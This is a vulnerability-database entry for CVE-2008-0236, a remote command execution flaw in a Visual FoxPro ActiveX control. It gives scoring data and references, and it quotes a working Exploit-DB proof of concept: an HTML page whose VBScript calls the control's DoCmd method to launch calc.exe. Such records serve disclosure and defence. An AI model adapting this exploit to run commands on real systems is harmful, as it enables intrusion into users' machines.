CVE-2008-0236 : Detail

CVE-2008-0236

34.65%V4
Network
2008-01-11
01h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

An ActiveX control for Microsoft Visual FoxPro (vfp6r.dll 6.0.8862.0) allows remote attackers to execute arbitrary commands by invoking the DoCmd method.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5.8 AV:N/AC:M/Au:N/C:P/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4873

Publication date : 2008-01-08 23h00 +00:00
Author : shinnai
EDB Verified : Yes

<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- <b>Microsoft FoxServer (vfp6r.dll 6.0.8862.0) Remote Command Execution</b> url: http://www.microsoft.com Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org <b><font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font></b> Not much more to say than using "DoCmd()" function, you can run applications passed as argument. Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 ----------------------------------------------------------------------------- <object classid='clsid:008B6010-1F3D-11D1-B0C8-00A0C9055D74' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.DoCmd "RUN calc.exe" End Sub </script> </span></span> </code></pre> # milw0rm.com [2008-01-09]

Products Mentioned

Configuraton 0

Microsoft>>Visual_foxpro >> Version 6.0

References

http://secunia.com/advisories/28417
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/27205
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/4873
Tags : exploit, x_refsource_EXPLOIT-DB